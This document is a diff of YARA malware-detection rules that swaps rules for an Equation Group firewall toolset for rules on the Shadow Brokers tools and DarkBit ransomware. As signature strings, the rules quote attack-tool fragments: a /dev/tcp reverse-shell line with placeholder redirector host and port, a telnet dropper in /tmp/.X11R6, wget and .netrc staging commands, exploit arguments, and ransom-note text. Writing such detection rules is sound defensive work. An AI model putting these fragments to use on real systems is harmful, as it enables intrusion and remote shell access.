 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L350-L367"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L244-L258"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "834180ef512882cc3b22e79a6bda349678eb5042a3356a50c47eeb36ae453427"
+		logic_hash = "0a45ea3cd6aeea9299ef67ae82c9f4bf929a961695e7cce344aa1737fa4c07b0"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d809d6ff23a9eee53d2132d2c13a9ac5d0cb3037c60e229373fc59a4f14bc744"
+		hash1 = "390e776ae15fadad2e3825a5e2e06c4f8de6d71813bef42052c7fd8494146222"
 
 	strings:
-		$s1 = ".got_loader" fullword ascii
-		$s2 = "_start_text" ascii
-		$s3 = "IMPLANT" fullword ascii
-		$s4 = "KEEPGOING" fullword ascii
-		$s5 = "upgrade_implant" fullword ascii
+		$x1 = "-t 127.0.0.1 -p SERVICE_TCP_PORT -r TARGET_RPC_SERVICE -X"
+		$x2 = "-N -A SPECIFIC_SHELLCODE_ADDRESS" fullword ascii
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_EQGRP_Networkprofiler_Orderscans
+rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Stoicsurgeon
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file networkProfiler_orderScans.sh"
+		description = "Auto-generated rule - file user.tool.stoicsurgeon.COMMON"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2d48df0c-f950-5bb6-8d3e-77c2f970eb57"
-		date = "2016-08-16"
+		id = "2ff22b17-4922-54d7-bbd8-a5ff40b6ebe5"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L369-L383"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L260-L273"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0cdf4f3d8f668ce5d5aab652c83cb4d2a9acc3471ff720448d021707b34402ef"
+		logic_hash = "322599ba7d5536b7f0856980a6caab86de66c02da75bf55e97bf129d08c43031"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ea986ddee09352f342ac160e805312e3a901e58d2beddf79cd421443ba8c9898"
+		hash1 = "967facb19c9b563eb90d3df6aa89fd7dcfa889b0ba601d3423d9b71b44191f50"
 
 	strings:
-		$x1 = "Unable to save off predefinedScans directory" fullword ascii
-		$x2 = "Re-orders the networkProfiler scans so they show up in order in the LP" fullword ascii
+		$x1 = "echo -n TARGET_HOSTNAME  | sed '/\\n/!G;s/\\(.\\)\\(.*\\n\\)/&\\2\\1/;//D;s/.//'" fullword ascii
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_EQGRP_Epicbanana_2_1_0_1
+rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Elgingamble
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file epicbanana_2.1.0.1.py"
+		description = "Auto-generated rule - file user.tool.elgingamble.COMMON"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cc3346bd-0347-5cf3-b946-5c017d68d93e"
-		date = "2016-08-16"
+		id = "344e5d5e-9fd6-5a32-ba98-945f5a35a116"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L385-L399"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L275-L288"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "be0b180e0dfdda35725ac6d9c35752a0b56bdbdaf985b6932c7d2ff342d4cde3"
+		logic_hash = "2f4dd668c59244e92ebfe0e2fc2859b2376cf1dd6fc6522e8f452787aa96365f"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4b13cc183c3aaa8af43ef3721e254b54296c8089a0cd545ee3b867419bb66f61"
+		hash1 = "4130284727ddef4610d63bfa8330cdafcb6524d3d2e7e8e0cb34fde8864c8118"
 
 	strings:
-		$s1 = "failed to create version-specific payload" fullword ascii
-		$s2 = "(are you sure you did \"make [version]\" in versions?)" fullword ascii
+		$x2 = "### Local exploit for" fullword ascii
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_EQGRP_Sniffer_Xml2Pcap
+rule SIGNATURE_BASE_FVEY_Shadowbroker_README_Cup
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file sniffer_xml2pcap"
+		description = "Auto-generated rule - file README.cup.NOPEN"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c284ac58-923c-5c34-b420-e87797915233"
-		date = "2016-08-16"
+		id = "876f3d99-cc6d-568a-a202-1b4938436303"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L401-L415"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L290-L304"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3c3aa9f42edbca32725f8c02023e3b9644162a001ded099513d12f94d70dd4c8"
+		logic_hash = "bd05a23ce29be88c1a459358c984e1317cf56d21e5b378624af644fb2b41931d"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f5e5d75cfcd86e5c94b0e6f21bbac886c7e540698b1556d88a83cc58165b8e42"
+		hash1 = "98aaad31663b89120eb781b25d6f061037aecaeb20cf5e32c36c68f34807e271"
 
 	strings:
-		$x1 = "-s/--srcip <sourceIP>  Use given source IP (if sniffer doesn't collect source IP)" fullword ascii
-		$x2 = "convert an XML file generated by the BLATSTING sniffer module into a pcap capture file." fullword ascii
+		$s3 = "-F file(s)   Full path to target's \"fuser\" program." fullword ascii
+		$s4 = "done after the RAT is killed." fullword ascii
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_EQGRP_Bananaaid
+rule SIGNATURE_BASE_FVEY_Shadowbroker_Nopen_Oneshot
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file BananaAid"
+		description = "Auto-generated rule - file oneshot.example"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bdd3ce51-1809-5b2f-9c7e-6c0b056d022b"
-		date = "2016-08-16"
+		id = "6a6b5426-f559-5668-a2ed-982801933302"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L417-L433"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L306-L319"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2ae52529547866dcfe66fffb3f5b37eba89844b7675129c66636ebef01b0f49a"
+		logic_hash = "19aa32aafaaccc6697bbaff642d996554eccf2261d23071cfb8599ea0eea628b"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7a4fb825e63dc612de81bc83313acf5eccaa7285afc05941ac1fef199279519f"
+		hash1 = "a85b260d6a53ceec63ad5f09e1308b158da31062047dc0e4d562d2683a82bf9a"
 
 	strings:
-		$x1 = "(might have to delete key in ~/.ssh/known_hosts on linux box)" fullword ascii
-		$x2 = "scp BGLEE-" ascii
-		$x3 = "should be 4bfe94b1 for clean bootloader version 3.0; " fullword ascii
-		$x4 = "scp <configured implant> <username>@<IPaddr>:onfig" fullword ascii
+		$s1 = "/sbin/sh -c (mkdir /tmp/.X11R6; cd /tmp/.X11R6 && telnet" ascii
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_EQGRP_Bo : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Earlyshovel
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file bo"
+		description = "Auto-generated rule - file user.tool.earlyshovel.COMMON"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6aa71528-3ce6-5597-bb1a-e44cff3856d6"
-		date = "2016-08-16"
+		id = "d2640f9f-8934-5095-9c30-f24941685c9e"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L435-L452"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L321-L334"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "48c2d3f13283d2a1b7e1010c724f1e68e6002dd9a9779025dfc3a4952bec95bc"
+		logic_hash = "396810b439ac53f393ad37a8acbd7236f8325730c75c1a6339e4c6343ecade7a"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "aa8b363073e8ae754b1836c30f440d7619890ded92fb5b97c73294b15d22441d"
+		hash1 = "504e7a376c21ffbfb375353c5451dc69a35a10d7e2a5d0358f9ce2df34edf256"
 
 	strings:
-		$s1 = "ERROR: failed to open %s: %d" fullword ascii
-		$s2 = "__libc_start_main@@GLIBC_2.0" ascii
-		$s3 = "serial number: %s" fullword ascii
-		$s4 = "strerror@@GLIBC_2.0" fullword ascii
-		$s5 = "ERROR: mmap failed: %d" fullword ascii
+		$x1 = "--tip 127.0.0.1 --tport 2525 --cip REDIRECTOR_IP --cport RANDOM_PORT" ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 20KB and all of them )
+		1 of them
 }
-rule SIGNATURE_BASE_EQGRP_Seconddate_2211 : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Envisioncollision
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file SecondDate-2211.exe"
+		description = "Auto-generated rule - file user.tool.envisioncollision.COMMON"
 		author = "Florian Roth (Nextron Systems)"
-		id = "00951270-6189-58b6-8b64-422c4ab15ebe"
-		date = "2016-08-16"
+		id = "a738e270-a3ea-5d38-8933-797d1bd9036a"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L454-L470"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L336-L352"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f51f4cfb3b1c77f03a3627cccfee72e57731b26b01907cc837f246a8f7677580"
+		logic_hash = "36b2a20ef3a6540a686d7f52c8c885842fd84ba7c7daa74c21e241e25826030e"
 		score = 75
-		quality = 83
-		tags = "FILE"
+		quality = 85
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2337d0c81474d03a02c404cada699cf1b86c3c248ea808d4045b86305daa2607"
+		hash1 = "2f04f078a8f0fdfc864d3d2e37d123f55ecc1d5e401a87eccd0c3846770f9e02"
 
 	strings:
-		$s1 = "SD_processControlPacket" fullword ascii
-		$s2 = "Encryption_rc4SetKey" fullword ascii
-		$s3 = ".got_loader" fullword ascii
-		$s4 = "^GET.*(?:/ |\\.(?:htm|asp|php)).*\\r\\n" fullword ascii
+		$x1 = "-i<IP> -p<port> -U<user> -P<password> -D<directory> -c<commands>" fullword ascii
+		$x2 = "sh</dev/tcp/REDIR_IP/SHELL_PORT>&0" fullword ascii
+		$x3 = "-n ENVISIONCOLLISION" ascii
+		$x4 = "-UADMIN -PPASSWORD -i127.0.0.1 -Dipboard" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 200KB and all of them )
+		1 of them
 }
-rule SIGNATURE_BASE_EQGRP_Config_Jp1_UA
+rule SIGNATURE_BASE_FVEY_Shadowbroker_Gen_Readme1
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file config_jp1_UA.pl"
+		description = "Auto-generated rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "947e6f90-4eb4-5241-9819-677cee0c15d8"
-		date = "2016-08-16"
+		id = "1f5e3ab1-e0d1-589e-8c18-60c4ad07ee6e"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L472-L488"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L356-L372"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8dd504bd00f72b1500375fbe451f5abb055cb2ff440f6ae4314b1e3d64097b83"
+		logic_hash = "171d3df191e5c9ae4a4afc3a878cc25548238046b8c4c52dbb9ca4431aae45b0"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2f50b6e9891e4d7fd24cc467e7f5cfe348f56f6248929fec4bbee42a5001ae56"
+		super_rule = 1
+		hash1 = "4b236b066ac7b8386a13270dcb7fdff2dda81365d03f53867eb72e29d5e496de"
+		hash2 = "64c24bbf42f15dcac04371aef756feabb7330f436c20f33cb25fbc8d0ff014c7"
+		hash3 = "a237a2bd6aec429f9941d6de632aeb9729880aa3d5f6f87cf33a76d6caa30619"
 
 	strings:
-		$x1 = "This program will configure a JETPLOW Userarea file." fullword ascii
-		$x2 = "Error running config_implant." fullword ascii
-		$x3 = "NOTE:  IT ASSUMES YOU ARE OPERATING IN THE INSTALL/LP/JP DIRECTORY. THIS ASSUMPTION " fullword ascii
-		$x4 = "First IP address for beacon destination [127.0.0.1]" fullword ascii
+		$x1 = "ls -latr /tp/med/archive/collect/siemens_msc_isb01/.tmp_ncr/*.MSC | head -10" fullword ascii
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_EQGRP_Userscript
+rule SIGNATURE_BASE_FVEY_Shadowbroker_Gen_Readme2
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file userscript.FW"
+		description = "Auto-generated rule - from files user.tool.orleansstride.COMMON, user.tool.curserazor.COMMON"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c6c1b70e-437f-50e7-9055-b943a1a62e6c"
-		date = "2016-08-16"
+		id = "5959d881-2989-582c-abe2-48c76ce0e995"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L490-L503"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L374-L389"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "718ee434c8ae61e2709df6dd431dbb0a2230085f0132ae82c7ceda4de75248cf"
+		logic_hash = "eb68c415d64d1db3d4bb0f4ad994bd050cb2287e4dc7b3ac57549f818a7914d8"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5098ff110d1af56115e2c32f332ff6e3973fb7ceccbd317637c9a72a3baa43d7"
+		super_rule = 1
+		hash1 = "18dfd74c3e0bfb1c21127cf3382ba1d9812efdf3e992bd666d513aaf3519f728"
+		hash2 = "f4b728c93dba20a163b59b4790f29aed1078706d2c8b07dc7f4e07a6f3ecbe93"
 
 	strings:
-		$x1 = "Are you sure? Don't forget that NETSCREEN firewalls require BANANALIAR!! " fullword ascii
+		$x1 = "#####  Upload the encrypted phone list as awk, modify each parser command to have the" fullword ascii
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_EQGRP_BBALL_M50FW08_2201 : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_Gen_Readme3
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file BBALL_M50FW08-2201.exe"
+		description = "Auto-generated rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bced11a2-fac4-58e5-a4a8-1c6d5fe418f9"
-		date = "2016-08-16"
+		id = "41cfbf66-fb7d-5815-939f-06b23dfae746"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L505-L523"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L391-L411"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dd180203ec4c4ddfa2c46cba672eb94179553637a9f7548b25dee7b88c3d3294"
+		logic_hash = "968ec80f26750ac734ad9e296b5afb35867f6c53de1e88f7c8af78daeac24b61"
 		score = 75
-		quality = 83
-		tags = "FILE"
+		quality = 85
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "80c0b68adb12bf3c15eff9db70a57ab999aad015da99c4417fdfd28156d8d3f7"
+		super_rule = 1
+		hash1 = "18dfd74c3e0bfb1c21127cf3382ba1d9812efdf3e992bd666d513aaf3519f728"
+		hash2 = "4b236b066ac7b8386a13270dcb7fdff2dda81365d03f53867eb72e29d5e496de"
+		hash3 = "3fe78949a9f3068db953b475177bcad3c76d16169469afd72791b4312f60cfb3"
+		hash4 = "64c24bbf42f15dcac04371aef756feabb7330f436c20f33cb25fbc8d0ff014c7"
+		hash5 = "a237a2bd6aec429f9941d6de632aeb9729880aa3d5f6f87cf33a76d6caa30619"
+		hash6 = "89748906d1c574a75fe030645c7572d7d4145b143025aa74c9b5e2be69df8773"
+		hash7 = "f4b728c93dba20a163b59b4790f29aed1078706d2c8b07dc7f4e07a6f3ecbe93"
 
 	strings:
-		$s1 = ".got_loader" fullword ascii
-		$s2 = "LOADED" fullword ascii
-		$s3 = "pageTable.c" fullword ascii
-		$s4 = "_start_text" ascii
-		$s5 = "handler_readBIOS" fullword ascii
-		$s6 = "KEEPGOING" fullword ascii
+		$s3 = ":%s/CRYPTKEY/CRYPTKEY/g" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 40KB and 5 of ( $s* ) )
+		1 of them
 }
-rule SIGNATURE_BASE_EQGRP_BUSURPER_3001_724 : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_Gen_Readme4
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file BUSURPER-3001-724.exe"
+		description = "Auto-generated rule - from files violetspirit.README, violetspirit.README"
 		author = "Florian Roth (Nextron Systems)"
-		id = "006877e9-1e73-5a27-8b3a-bca3513a2035"
-		date = "2016-08-16"
+		id = "9e84e4ab-f74a-59e5-aee2-408a68cd673f"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L525-L540"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_dec16.yar#L413-L429"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "531f7039290b386f070378cb4ba49a57b5031fb16b3972b61f4fb904770fc4ac"
+		logic_hash = "c19c77d7e7e26e01a9a50fd67cc0a7fd05069def878bf18726c3e115df307cb2"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6b558a6b8bf3735a869365256f9f2ad2ed75ccaa0eefdc61d6274df4705e978b"
+		super_rule = 1
+		hash1 = "a55fec73595f885e43b27963afb17aee8f8eefe811ca027ef0d7721d073e67ea"
+		hash2 = "a55fec73595f885e43b27963afb17aee8f8eefe811ca027ef0d7721d073e67ea"
 
 	strings:
-		$s1 = "IMPLANT" fullword ascii
-		$s2 = "KEEPGOING" fullword ascii
-		$s3 = "upgrade_implant" fullword ascii
+		$s1 = "[-v rpc version] : default 4 : Solaris 8 and other patched versions use version 5" fullword ascii
+		$s5 = "[-n tcp_port]    : default use portmapper to determine" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 200KB and 2 of them ) or ( all of them )
+		1 of them
 }
-rule SIGNATURE_BASE_EQGRP_Workit
+rule SIGNATURE_BASE_MAL_RANSOM_Darkbit_Feb23_1 : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file workit.py"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b582f990-5bd5-592d-a7c0-475fdfffc38c"
-		date = "2016-08-16"
-		modified = "2023-01-27"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L542-L566"
+		description = "Detects indicators found in DarkBit ransomware"
+		author = "Florian Roth"
+		id = "d209a0c2-f649-5fb1-9ecd-f1c35caa796f"
+		date = "2023-02-13"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/idonaor1/status/1624703255770005506?s=12&t=mxHaauzwR6YOj5Px8cIeIw"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ransom_darkbit_feb23.yar#L2-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1fa61e8c2012e664fee97ff608bcd8845bbd9701fa02d39d49379f7f83a5636d"
+		logic_hash = "ba1baea7cb7362160c4b00b0355000a789b238c1ec82b840479c04028e6ca3ab"
 		score = 75
-		quality = 35
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fb533b4d255b4e6072a4fa2e1794e38a165f9aa66033340c2f4f8fd1da155fac"
+		quality = 85
+		tags = "FILE"
 
 	strings:
-		$s1 = "macdef init > /tmp/.netrc;" fullword ascii
-		$s2 = "/usr/bin/wget http://" ascii
-		$s3 = "HOME=/tmp ftp" fullword ascii
-		$s4 = " >> /tmp/.netrc;" fullword ascii
-		$s5 = "/usr/rapidstream/bin/tftp" fullword ascii
-		$s6 = "created shell_command:" fullword ascii
-		$s7 = "rm -f /tmp/.netrc;" fullword ascii
-		$s8 = "echo quit >> /tmp/.netrc;" fullword ascii
-		$s9 = "echo binary >> /tmp/.netrc;" fullword ascii
-		$s10 = "chmod 600 /tmp/.netrc;" fullword ascii
-		$s11 = "created cli_command:" fullword ascii
+		$s1 = ".onion" ascii
+		$s2 = "GetMOTWHostUrl"
+		$x1 = "hus31m7c7ad.onion"
+		$x2 = "iw6v2p3cruy"
+		$xn1 = "You will receive decrypting key after the payment."
 
 	condition:
-		6 of them
+		uint16( 0 ) == 0x5a4d and filesize < 10MB and ( 1 of ( $x* ) or 2 of them ) or 4 of them or ( filesize < 10MB and $xn1 )
 }
-rule SIGNATURE_BASE_EQGRP_Tinyhttp_Setup : FILE
+rule SIGNATURE_BASE_MAL_RANSOM_Darkbit_Feb23_2 : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file tinyhttp_setup.sh"
-		author = "Florian Roth (Nextron Systems)"
-		id = "71dcc48f-f551-5596-9f03-dbbae470a62b"
-		date = "2016-08-16"
+		description = "Detects Go based DarkBit ransomware (garbled code; could trigger on other obfuscated samples, too)"
+		author = "Florian Roth"
+		id = "f530815c-68e7-55f1-8e36-bc74a1059584"
+		date = "2023-02-13"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L568-L584"
+		reference = "https://www.hybrid-analysis.com/sample/9107be160f7b639d68fe3670de58ed254d81de6aec9a41ad58d91aa814a247ff?environmentId=160"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ransom_darkbit_feb23.yar#L25-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0d560206e634f3bfeffe5b7de3edf02f6c76443ffb5c0de37180e63276a19457"
+		logic_hash = "577435536300902811612a3415e82420574c98345b91b21fb2bfd2bfde396bec"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3d12c83067a9f40f2f5558d3cf3434bbc9a4c3bb9d66d0e3c0b09b9841c766a0"
+		hash1 = "9107be160f7b639d68fe3670de58ed254d81de6aec9a41ad58d91aa814a247ff"
 
 	strings:
-		$x1 = "firefox http://127.0.0.1:8000/$_name" fullword ascii
-		$x2 = "What is the name of your implant:" fullword ascii
-		$x3 = "killall thttpd" fullword ascii
-		$x4 = "copy http://<IP>:80/$_name flash:/$_name" fullword ascii
+		$s1 = "runtime.initLongPathSupport" ascii fullword
+		$s2 = "reflect." ascii
+		$s3 = "    \"processes\": []," ascii fullword
+		$s4 = "^!* %!(!" ascii fullword
+		$op1 = { 4d 8b b6 00 00 00 00 48 8b 94 24 40 05 00 00 31 c0 87 82 30 03 00 00 b8 01 00 00 00 f0 0f c1 82 00 03 00 00 48 8b 44 24 48 48 8b 0d ba 1f 32 00 }
+		$op2 = { 49 8d 49 01 0f 1f 00 48 39 d9 7c e2 b9 0b 00 00 00 49 89 d8 e9 28 fc ff ff e8 89 6c d7 ff }
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 2KB and 1 of ( $x* ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 20000KB and all of them
 }
-rule SIGNATURE_BASE_EQGRP_Shellcode
+rule SIGNATURE_BASE_No_Powershell : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - file shellcode.py"
+		description = "Detects an C# executable used to circumvent PowerShell detection - file nps.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d923c1de-c6eb-511f-ae1f-bf3ac6e0eae8"
-		date = "2016-08-16"
+		id = "362a61bc-2c10-5076-93be-9f8b5a9ae8ba"
+		date = "2016-05-21"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L586-L605"
+		reference = "https://github.com/Ben0xA/nps"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_nopowershell.yar#L8-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "69a04db721a0d17720f9db9386d47309f01d1fc31bd5e833cedb9e1c2eb573ae"
-		score = 75
